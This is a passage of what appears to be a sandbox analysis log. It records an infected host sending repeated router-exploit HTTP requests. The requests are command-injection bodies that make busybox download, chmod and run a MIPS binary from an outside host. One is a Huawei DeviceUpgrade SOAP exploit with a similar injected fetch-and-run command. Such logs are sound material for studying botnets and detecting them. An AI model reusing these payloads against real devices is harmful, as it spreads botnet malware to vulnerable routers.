                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              648192.168.2.133708294.123.247.318080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:00.682099104 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              649192.168.2.134517285.242.199.348080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:00.701564074 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              650192.168.2.133841094.123.183.618080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:00.709266901 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:04.966242075 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:11.110198975 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              651192.168.2.133579862.192.140.2288080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:00.868355989 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:01.064431906 CET189INHTTP/1.1 404 Not Found
                                              server: owsd
                                              content-type: text/html
                                              content-length: 38
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 34 3c 2f 68 31 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                              Data Ascii: <html><body><h1>404</h1></body></html>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              652192.168.2.135942694.190.212.2148080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:00.870708942 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:01.191761971 CET137INHTTP/1.1 404 Not Found
                                              Connection: close
                                              Transfer-Encoding: chunked


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              653192.168.2.134178094.121.28.918080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:01.097738981 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              654192.168.2.135885231.200.44.1038080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:01.714658022 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              655192.168.2.134171295.86.113.1608080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:01.717155933 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              656192.168.2.135044294.120.40.608080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:02.186999083 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              657192.168.2.134867062.29.41.408080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:02.277961016 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              658192.168.2.134377894.182.172.2118080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:02.309415102 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:02.575556993 CET247INHTTP/1.1 404 NOT FOUND
                                              Server: Werkzeug/3.0.1 Python/3.11.5
                                              Date: Thu, 23 Nov 2023 04:18:02 GMT
                                              Content-Type: text/html; charset=utf-8
                                              Content-Length: 207
                                              Connection: close


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              659192.168.2.133385894.111.46.1688080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:02.819458008 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              660192.168.2.133385662.29.47.1348080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:03.233551025 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              661192.168.2.133864894.122.207.2438080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:03.262255907 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              662192.168.2.133683095.217.95.2228080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:03.652225971 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:03.848407030 CET212INHTTP/1.1 404 Not Found
                                              Content-Type: text/plain
                                              Date: Thu, 23 Nov 2023 04:18:03 GMT
                                              Content-Length: 18
                                              Connection: close
                                              Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64
                                              Data Ascii: 404 page not found


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              663192.168.2.1353860156.234.127.10137215
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:03.744648933 CET790OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewSta
                                              Nov 23, 2023 05:18:03.905232906 CET361INHTTP/1.1 400 Bad Request
                                              Server: nginx
                                              Date: Thu, 23 Nov 2023 04:18:05 GMT
                                              Content-Type: text/html
                                              Content-Length: 150
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              664192.168.2.134115262.149.28.188080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:03.834402084 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:04.050426006 CET556INHTTP/1.1 400 Bad Request
                                              Date: Thu, 23 Nov 2023 04:18:03 GMT
                                              Server: Apache
                                              Connection: close
                                              Content-Type: text/html; charset=iso-8859-1
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              665192.168.2.133335431.136.6.668080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:03.837444067 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
